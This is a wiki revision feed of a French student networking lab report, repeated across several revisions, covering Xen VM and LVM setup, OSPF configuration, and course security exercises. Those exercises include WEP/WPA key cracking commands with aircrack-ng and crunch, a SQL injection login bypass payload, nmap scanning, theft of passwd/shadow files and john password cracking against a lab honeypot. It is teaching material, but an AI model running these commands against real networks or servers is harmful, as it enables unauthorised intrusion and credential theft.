  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  59&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                38&lt;br /&gt;
  Open LV               37&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       69632 / 272.00 GiB&lt;br /&gt;
  Free  PE / Size       1360894 / 5.19 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
On crée alors deux volumes logiques de 10 Go qui nous servirons de /var et /home :&lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n stropharia-home storage&lt;br /&gt;
 lvcreate -L10G -n stropharia-var storage&lt;br /&gt;
&lt;br /&gt;
Voici le résultat :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# lvdisplay | grep &amp;quot;stropharia&amp;quot; -A 15&lt;br /&gt;
  LV Path                /dev/storage/stropharia-home&lt;br /&gt;
  LV Name                stropharia-home&lt;br /&gt;
  VG Name                storage&lt;br /&gt;
  LV UUID                ofMU3m-QoN1-pZcA-32Dp-HJBN-ZNAn-O3awlc&lt;br /&gt;
  LV Write Access        read/write&lt;br /&gt;
  LV Creation host, time capbreton, 2020-10-12 17:40:11 +0200&lt;br /&gt;
  LV Status              available&lt;br /&gt;
  # open                 1&lt;br /&gt;
  LV Size                10.00 GiB&lt;br /&gt;
  Current LE             2560&lt;br /&gt;
  Segments               1&lt;br /&gt;
  Allocation             inherit&lt;br /&gt;
  Read ahead sectors     auto&lt;br /&gt;
  - currently set to     256&lt;br /&gt;
  Block device           254:18&lt;br /&gt;
   &lt;br /&gt;
  --- Logical volume ---&lt;br /&gt;
  LV Path                /dev/storage/stropharia-var&lt;br /&gt;
  LV Name                stropharia-var&lt;br /&gt;
  VG Name                storage&lt;br /&gt;
  LV UUID                8YAGLs-wD0c-6pSF-VEmC-wUfT-e9SI-8X9nFn&lt;br /&gt;
  LV Write Access        read/write&lt;br /&gt;
  LV Creation host, time capbreton, 2020-10-12 17:40:15 +0200&lt;br /&gt;
  LV Status              available&lt;br /&gt;
  # open                 1&lt;br /&gt;
  LV Size                10.00 GiB&lt;br /&gt;
  Current LE             2560&lt;br /&gt;
  Segments               1&lt;br /&gt;
  Allocation             inherit&lt;br /&gt;
  Read ahead sectors     auto&lt;br /&gt;
  - currently set to     256&lt;br /&gt;
  Block device           254:19&lt;br /&gt;
&lt;br /&gt;
On formate nos partitions au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/stropharia-home&lt;br /&gt;
 mkfs.ext4 /dev/storage/stropharia-var&lt;br /&gt;
&lt;br /&gt;
On note ces modifications dans /etc/xen/stropharia.cfg&lt;br /&gt;
&lt;br /&gt;
 disk       = [&lt;br /&gt;
              'file:/usr/local/xen/domains/trompettedelamort/disk.img,xvda2,w',&lt;br /&gt;
              'file:/usr/local/xen/domains/trompettedelamort/swap.img,xvda1,w',&lt;br /&gt;
              'phy:/dev/storage/trompettedelamort1,xvda3,w',&lt;br /&gt;
              'phy:/dev/storage/trompettedelamort2,xvda4,w'&lt;br /&gt;
            ]&lt;br /&gt;
&lt;br /&gt;
On lance maintenant la VM et l'on s'y connecte :&lt;br /&gt;
 xl create -c /etc/xen/stropharia.cfg&lt;br /&gt;
 xl console stropharia&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
On peut alors lancer la VM et s'y connecter :&lt;br /&gt;
 xl create -c /etc/xen/stropharia.cfg&lt;br /&gt;
 xen console stropharia&lt;br /&gt;
&lt;br /&gt;
=5.1=&lt;br /&gt;
=5.2  Cassage de clef WEP d’un point d’accès WiFi=&lt;br /&gt;
&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On lance un scran des réseaux wifi'''&lt;br /&gt;
 airmon-ng --encrypt wep wlan0mon&lt;br /&gt;
'''On capture les paquets'''&lt;br /&gt;
 airdump-ng --write crack11 --channel 3 --bssid 04:DA:D2:9C:50:5A wlan0mon&lt;br /&gt;
'''On lance le crack de la clé'''&lt;br /&gt;
 aircrack-ng -z crack11-01.cap&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [F1:DE:D4:00:00:00:00:0F:FF:FF:FF:FF:FF ]&lt;br /&gt;
=5.3=&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On regarde les réseaux pour avoir le BSSID'''&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
'''On lance la commande capture sur le channel 5 et on attend le handshake'''&lt;br /&gt;
 airodump-ng --write donnees -c 5 --bssid 00:14:1B:60:8C:2A&lt;br /&gt;
'''Pendant ce temps-là, nous créons le dictionnaire pour le brutforce'''&lt;br /&gt;
 crunch 8 8 0123456789 &amp;gt; dictionnaire.txt&lt;br /&gt;
'''Pour gagner du temps, nous divisions ce dictionnaire en 4 parties'''&lt;br /&gt;
 split -l 25000000 dictionnaire.txt dictionnairediv.txt&lt;br /&gt;
&lt;br /&gt;
'''On lance le brutforce sur plusieurs machine en fonction'''&lt;br /&gt;
 aircrack-ng -a2 -b 00:14:1B:60:8C:2A -w dictionnairediv#.txt donnees-01.cap&lt;br /&gt;
&lt;br /&gt;
=5.4=&lt;br /&gt;
=5.5  Intrusion sur un serveur d’application Web=&lt;br /&gt;
&lt;br /&gt;
Sur site honey.plil.info, on exploite la faille avec une injection SQL dans l'id et le mdp:&lt;br /&gt;
 ' OR 1 = 1 --&lt;br /&gt;
&lt;br /&gt;
On constate qu'il y a un service SSH et un serveur apache avec la commande suivante:&lt;br /&gt;
 nmap -T4 -A honey.plil.info&lt;br /&gt;
&lt;br /&gt;
Avec l'utilisation des manuels on extrait le fichier de configuration phpmyadmin afin d'avoir les identifiants pour se connecter honey.plil.fr/phpmyadmin. Il est important de se connecter en root avec le même mdp.&lt;br /&gt;
&lt;br /&gt;
Dans la BDD, on retrouve un compte d'un utilisateur ayant les droits sur la machine. On se connecte donc en SSH avec son compte et on extrait les fichier password et shadow.&lt;br /&gt;
&lt;br /&gt;
Nous allons donc utiliser john pour trouver le mdp root. De plus, nous créons notre dictionnaire avec crunch et sed en utilisant l'indice du sujet.&lt;br /&gt;
&lt;br /&gt;
Je lance donc la commande suivante:&lt;br /&gt;
 john --wordlist=dictionnaire password.txt unshadow.txt &amp;gt; output.txt&lt;br /&gt;
&lt;br /&gt;
Mdp trouvé et connexion en root(Groupe11):&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Honeygroupe11.png]]&lt;br /&gt;
&lt;br /&gt;
=Configuration OSPF sur 9200=&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                                  &lt;br /&gt;
 router-id 10.60.0.2                                  &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                                    &lt;br /&gt;
 summary-address 100.60.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                                  &lt;br /&gt;
 redistribute connected subnets                        &lt;br /&gt;
 redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
=Création de la VM=&lt;br /&gt;
&lt;br /&gt;
SSH sur capbreton&lt;br /&gt;
 xen-create-image&lt;br /&gt;
&lt;br /&gt;
=Configuration du dns sur Gandi=&lt;/div&gt;</summary>
		<author><name>Ccalleri</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=54158</id>
		<title>TP sysres IMA5sc 2020/2021 G11</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=54158"/>
				<updated>2020-11-30T16:48:56Z</updated>
		
		<summary type="html">&lt;p&gt;Ccalleri : /* Configuration LVM */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Sébastien DARDENNE - Corto CALLERISA&lt;br /&gt;
&lt;br /&gt;
=Adressage=&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! IP (privée) !! IP (publique) !! VLAN !! IPV4 !! IPV4 6509-E !! IPV4 C9200 !! IPV4 Routeur !! IPV6&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 11&lt;br /&gt;
| stropharia.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 100.64.0.18&lt;br /&gt;
| 193.48.57.178&lt;br /&gt;
| 311&lt;br /&gt;
| 10.60.111.0/24&lt;br /&gt;
| 10.60.111.1&lt;br /&gt;
| 10.60.111.2&lt;br /&gt;
| 10.60.111.254&lt;br /&gt;
| 2001:660:4401:60bd::0/64&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Mise en place de la machine virtuelle Xen=&lt;br /&gt;
==Creation de la VM==&lt;br /&gt;
&lt;br /&gt;
Après nous être connecté sur le serveur capbreton.plil.fr, nous créons la machine virtuelle du TP avec la commande :&lt;br /&gt;
 root@capbreton:~# xen-create-image --hostname=stropharia --password=pasglop --ip=100.64.0.18 --gateway=100.64.0.5 --netmask=255.255.255.0 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Cette commande spécifie les information de connexion à la VM ainsi que des informations réseau et la dernière version de Debian : Buster&lt;br /&gt;
&lt;br /&gt;
==Configuration LVM==&lt;br /&gt;
&lt;br /&gt;
Les disques de capbreton ont été initialisé pour l'utilisation avec LVM :&lt;br /&gt;
&lt;br /&gt;
 pvcreate /dev/sde&lt;br /&gt;
 pvcreate /dev/sdf&lt;br /&gt;
&lt;br /&gt;
Ces disques sont ensuite rassemblés dans le volume groupe storage :&lt;br /&gt;
 vgcreate storage /dev/sde /dev/sdf&lt;br /&gt;
&lt;br /&gt;
On obtient bien un groupe de 5.46 Tb :&lt;br /&gt;
 root@capbreton:~# vgdisplay storage&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  59&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                38&lt;br /&gt;
  Open LV               37&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       69632 / 272.00 GiB&lt;br /&gt;
  Free  PE / Size       1360894 / 5.19 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
On crée alors deux volumes logiques de 10 Go qui nous servirons de /var et /home :&lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n stropharia-home storage&lt;br /&gt;
 lvcreate -L10G -n stropharia-var storage&lt;br /&gt;
&lt;br /&gt;
Voici le résultat :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# lvdisplay | grep &amp;quot;stropharia&amp;quot; -A 15&lt;br /&gt;
  LV Path                /dev/storage/stropharia-home&lt;br /&gt;
  LV Name                stropharia-home&lt;br /&gt;
  VG Name                storage&lt;br /&gt;
  LV UUID                ofMU3m-QoN1-pZcA-32Dp-HJBN-ZNAn-O3awlc&lt;br /&gt;
  LV Write Access        read/write&lt;br /&gt;
  LV Creation host, time capbreton, 2020-10-12 17:40:11 +0200&lt;br /&gt;
  LV Status              available&lt;br /&gt;
  # open                 1&lt;br /&gt;
  LV Size                10.00 GiB&lt;br /&gt;
  Current LE             2560&lt;br /&gt;
  Segments               1&lt;br /&gt;
  Allocation             inherit&lt;br /&gt;
  Read ahead sectors     auto&lt;br /&gt;
  - currently set to     256&lt;br /&gt;
  Block device           254:18&lt;br /&gt;
   &lt;br /&gt;
  --- Logical volume ---&lt;br /&gt;
  LV Path                /dev/storage/stropharia-var&lt;br /&gt;
  LV Name                stropharia-var&lt;br /&gt;
  VG Name                storage&lt;br /&gt;
  LV UUID                8YAGLs-wD0c-6pSF-VEmC-wUfT-e9SI-8X9nFn&lt;br /&gt;
  LV Write Access        read/write&lt;br /&gt;
  LV Creation host, time capbreton, 2020-10-12 17:40:15 +0200&lt;br /&gt;
  LV Status              available&lt;br /&gt;
  # open                 1&lt;br /&gt;
  LV Size                10.00 GiB&lt;br /&gt;
  Current LE             2560&lt;br /&gt;
  Segments               1&lt;br /&gt;
  Allocation             inherit&lt;br /&gt;
  Read ahead sectors     auto&lt;br /&gt;
  - currently set to     256&lt;br /&gt;
  Block device           254:19&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
On peut alors lancer la VM et s'y connecter :&lt;br /&gt;
 xl create -c /etc/xen/stropharia.cfg&lt;br /&gt;
 xen console stropharia&lt;br /&gt;
&lt;br /&gt;
=5.1=&lt;br /&gt;
=5.2  Cassage de clef WEP d’un point d’accès WiFi=&lt;br /&gt;
&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On lance un scran des réseaux wifi'''&lt;br /&gt;
 airmon-ng --encrypt wep wlan0mon&lt;br /&gt;
'''On capture les paquets'''&lt;br /&gt;
 airdump-ng --write crack11 --channel 3 --bssid 04:DA:D2:9C:50:5A wlan0mon&lt;br /&gt;
'''On lance le crack de la clé'''&lt;br /&gt;
 aircrack-ng -z crack11-01.cap&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [F1:DE:D4:00:00:00:00:0F:FF:FF:FF:FF:FF ]&lt;br /&gt;
=5.3=&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On regarde les réseaux pour avoir le BSSID'''&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
'''On lance la commande capture sur le channel 5 et on attend le handshake'''&lt;br /&gt;
 airodump-ng --write donnees -c 5 --bssid 00:14:1B:60:8C:2A&lt;br /&gt;
'''Pendant ce temps-là, nous créons le dictionnaire pour le brutforce'''&lt;br /&gt;
 crunch 8 8 0123456789 &amp;gt; dictionnaire.txt&lt;br /&gt;
'''Pour gagner du temps, nous divisions ce dictionnaire en 4 parties'''&lt;br /&gt;
 split -l 25000000 dictionnaire.txt dictionnairediv.txt&lt;br /&gt;
&lt;br /&gt;
'''On lance le brutforce sur plusieurs machine en fonction'''&lt;br /&gt;
 aircrack-ng -a2 -b 00:14:1B:60:8C:2A -w dictionnairediv#.txt donnees-01.cap&lt;br /&gt;
&lt;br /&gt;
=5.4=&lt;br /&gt;
=5.5  Intrusion sur un serveur d’application Web=&lt;br /&gt;
&lt;br /&gt;
Sur site honey.plil.info, on exploite la faille avec une injection SQL dans l'id et le mdp:&lt;br /&gt;
 ' OR 1 = 1 --&lt;br /&gt;
&lt;br /&gt;
On constate qu'il y a un service SSH et un serveur apache avec la commande suivante:&lt;br /&gt;
 nmap -T4 -A honey.plil.info&lt;br /&gt;
&lt;br /&gt;
Avec l'utilisation des manuels on extrait le fichier de configuration phpmyadmin afin d'avoir les identifiants pour se connecter honey.plil.fr/phpmyadmin. Il est important de se connecter en root avec le même mdp.&lt;br /&gt;
&lt;br /&gt;
Dans la BDD, on retrouve un compte d'un utilisateur ayant les droits sur la machine. On se connecte donc en SSH avec son compte et on extrait les fichier password et shadow.&lt;br /&gt;
&lt;br /&gt;
Nous allons donc utiliser john pour trouver le mdp root. De plus, nous créons notre dictionnaire avec crunch et sed en utilisant l'indice du sujet.&lt;br /&gt;
&lt;br /&gt;
Je lance donc la commande suivante:&lt;br /&gt;
 john --wordlist=dictionnaire password.txt unshadow.txt &amp;gt; output.txt&lt;br /&gt;
&lt;br /&gt;
Mdp trouvé et connexion en root(Groupe11):&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Honeygroupe11.png]]&lt;br /&gt;
&lt;br /&gt;
=Configuration OSPF sur 9200=&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                                  &lt;br /&gt;
 router-id 10.60.0.2                                  &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                                    &lt;br /&gt;
 summary-address 100.60.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                                  &lt;br /&gt;
 redistribute connected subnets                        &lt;br /&gt;
 redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
=Création de la VM=&lt;br /&gt;
&lt;br /&gt;
SSH sur capbreton&lt;br /&gt;
 xen-create-image&lt;br /&gt;
&lt;br /&gt;
=Configuration du dns sur Gandi=&lt;/div&gt;</summary>
		<author><name>Ccalleri</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=54150</id>
		<title>TP sysres IMA5sc 2020/2021 G11</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=54150"/>
				<updated>2020-11-30T16:41:51Z</updated>
		
		<summary type="html">&lt;p&gt;Ccalleri : /* Configuration LVM */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Sébastien DARDENNE - Corto CALLERISA&lt;br /&gt;
&lt;br /&gt;
=Adressage=&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! IP (privée) !! IP (publique) !! VLAN !! IPV4 !! IPV4 6509-E !! IPV4 C9200 !! IPV4 Routeur !! IPV6&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 11&lt;br /&gt;
| stropharia.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 100.64.0.18&lt;br /&gt;
| 193.48.57.178&lt;br /&gt;
| 311&lt;br /&gt;
| 10.60.111.0/24&lt;br /&gt;
| 10.60.111.1&lt;br /&gt;
| 10.60.111.2&lt;br /&gt;
| 10.60.111.254&lt;br /&gt;
| 2001:660:4401:60bd::0/64&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Mise en place de la machine virtuelle Xen=&lt;br /&gt;
==Creation de la VM==&lt;br /&gt;
&lt;br /&gt;
Après nous être connecté sur le serveur capbreton.plil.fr, nous créons la machine virtuelle du TP avec la commande :&lt;br /&gt;
 root@capbreton:~# xen-create-image --hostname=stropharia --password=pasglop --ip=100.64.0.18 --gateway=100.64.0.5 --netmask=255.255.255.0 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Cette commande spécifie les information de connexion à la VM ainsi que des informations réseau et la dernière version de Debian : Buster&lt;br /&gt;
&lt;br /&gt;
==Configuration LVM==&lt;br /&gt;
&lt;br /&gt;
Les disques de capbreton ont été initialisé pour l'utilisation avec LVM :&lt;br /&gt;
&lt;br /&gt;
 pvcreate /dev/sde&lt;br /&gt;
 pvcreate /dev/sdf&lt;br /&gt;
&lt;br /&gt;
Ces disques sont ensuite rassemblés dans le volume groupe storage :&lt;br /&gt;
 vgcreate storage /dev/sde /dev/sdf&lt;br /&gt;
&lt;br /&gt;
On obtient bien un groupe de 5.46 Tb :&lt;br /&gt;
 root@capbreton:~# vgdisplay storage&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  59&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                38&lt;br /&gt;
  Open LV               37&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       69632 / 272.00 GiB&lt;br /&gt;
  Free  PE / Size       1360894 / 5.19 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
On peut alors lancer la VM et s'y connecter :&lt;br /&gt;
 xl create -c /etc/xen/stropharia.cfg&lt;br /&gt;
 xen console stropharia&lt;br /&gt;
&lt;br /&gt;
=5.1=&lt;br /&gt;
=5.2  Cassage de clef WEP d’un point d’accès WiFi=&lt;br /&gt;
&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On lance un scran des réseaux wifi'''&lt;br /&gt;
 airmon-ng --encrypt wep wlan0mon&lt;br /&gt;
'''On capture les paquets'''&lt;br /&gt;
 airdump-ng --write crack11 --channel 3 --bssid 04:DA:D2:9C:50:5A wlan0mon&lt;br /&gt;
'''On lance le crack de la clé'''&lt;br /&gt;
 aircrack-ng -z crack11-01.cap&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [F1:DE:D4:00:00:00:00:0F:FF:FF:FF:FF:FF ]&lt;br /&gt;
=5.3=&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On regarde les réseaux pour avoir le BSSID'''&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
'''On lance la commande capture sur le channel 5 et on attend le handshake'''&lt;br /&gt;
 airodump-ng --write donnees -c 5 --bssid 00:14:1B:60:8C:2A&lt;br /&gt;
'''Pendant ce temps-là, nous créons le dictionnaire pour le brutforce'''&lt;br /&gt;
 crunch 8 8 0123456789 &amp;gt; dictionnaire.txt&lt;br /&gt;
'''Pour gagner du temps, nous divisions ce dictionnaire en 4 parties'''&lt;br /&gt;
 split -l 25000000 dictionnaire.txt dictionnairediv.txt&lt;br /&gt;
&lt;br /&gt;
'''On lance le brutforce sur plusieurs machine en fonction'''&lt;br /&gt;
 aircrack-ng -a2 -b 00:14:1B:60:8C:2A -w dictionnairediv#.txt donnees-01.cap&lt;br /&gt;
&lt;br /&gt;
=5.4=&lt;br /&gt;
=5.5  Intrusion sur un serveur d’application Web=&lt;br /&gt;
&lt;br /&gt;
Sur site honey.plil.info, on exploite la faille avec une injection SQL dans l'id et le mdp:&lt;br /&gt;
 ' OR 1 = 1 --&lt;br /&gt;
&lt;br /&gt;
On constate qu'il y a un service SSH et un serveur apache avec la commande suivante:&lt;br /&gt;
 nmap -T4 -A honey.plil.info&lt;br /&gt;
&lt;br /&gt;
Avec l'utilisation des manuels on extrait le fichier de configuration phpmyadmin afin d'avoir les identifiants pour se connecter honey.plil.fr/phpmyadmin. Il est important de se connecter en root avec le même mdp.&lt;br /&gt;
&lt;br /&gt;
Dans la BDD, on retrouve un compte d'un utilisateur ayant les droits sur la machine. On se connecte donc en SSH avec son compte et on extrait les fichier password et shadow.&lt;br /&gt;
&lt;br /&gt;
Nous allons donc utiliser john pour trouver le mdp root. De plus, nous créons notre dictionnaire avec crunch et sed en utilisant l'indice du sujet.&lt;br /&gt;
&lt;br /&gt;
Je lance donc la commande suivante:&lt;br /&gt;
 john --wordlist=dictionnaire password.txt unshadow.txt &amp;gt; output.txt&lt;br /&gt;
&lt;br /&gt;
Mdp trouvé et connexion en root(Groupe11):&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Honeygroupe11.png]]&lt;br /&gt;
&lt;br /&gt;
=Configuration OSPF sur 9200=&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                                  &lt;br /&gt;
 router-id 10.60.0.2                                  &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                                    &lt;br /&gt;
 summary-address 100.60.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                                  &lt;br /&gt;
 redistribute connected subnets                        &lt;br /&gt;
 redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
=Création de la VM=&lt;br /&gt;
&lt;br /&gt;
SSH sur capbreton&lt;br /&gt;
 xen-create-image&lt;br /&gt;
&lt;br /&gt;
=Configuration du dns sur Gandi=&lt;/div&gt;</summary>
		<author><name>Ccalleri</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=54149</id>
		<title>TP sysres IMA5sc 2020/2021 G11</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=54149"/>
				<updated>2020-11-30T16:41:37Z</updated>
		
		<summary type="html">&lt;p&gt;Ccalleri : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Sébastien DARDENNE - Corto CALLERISA&lt;br /&gt;
&lt;br /&gt;
=Adressage=&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! IP (privée) !! IP (publique) !! VLAN !! IPV4 !! IPV4 6509-E !! IPV4 C9200 !! IPV4 Routeur !! IPV6&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 11&lt;br /&gt;
| stropharia.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 100.64.0.18&lt;br /&gt;
| 193.48.57.178&lt;br /&gt;
| 311&lt;br /&gt;
| 10.60.111.0/24&lt;br /&gt;
| 10.60.111.1&lt;br /&gt;
| 10.60.111.2&lt;br /&gt;
| 10.60.111.254&lt;br /&gt;
| 2001:660:4401:60bd::0/64&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Mise en place de la machine virtuelle Xen=&lt;br /&gt;
==Creation de la VM==&lt;br /&gt;
&lt;br /&gt;
Après nous être connecté sur le serveur capbreton.plil.fr, nous créons la machine virtuelle du TP avec la commande :&lt;br /&gt;
 root@capbreton:~# xen-create-image --hostname=stropharia --password=pasglop --ip=100.64.0.18 --gateway=100.64.0.5 --netmask=255.255.255.0 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Cette commande spécifie les information de connexion à la VM ainsi que des informations réseau et la dernière version de Debian : Buster&lt;br /&gt;
&lt;br /&gt;
==Configuration LVM==&lt;br /&gt;
&lt;br /&gt;
Les disques de capbreton ont été initialisé pour l'utilisation avec LVM :&lt;br /&gt;
&lt;br /&gt;
 pvcreate /dev/sde&lt;br /&gt;
 pvcreate /dev/sdf&lt;br /&gt;
&lt;br /&gt;
Ces disques sont ensuite rassemblés dans le volume groupe storage :&lt;br /&gt;
 vgcreate storage /dev/sde /dev/sdf&lt;br /&gt;
&lt;br /&gt;
On obtient bien un groupe de 5.49 Tb :&lt;br /&gt;
 root@capbreton:~# vgdisplay storage&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  59&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                38&lt;br /&gt;
  Open LV               37&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       69632 / 272.00 GiB&lt;br /&gt;
  Free  PE / Size       1360894 / 5.19 TiB&lt;br /&gt;
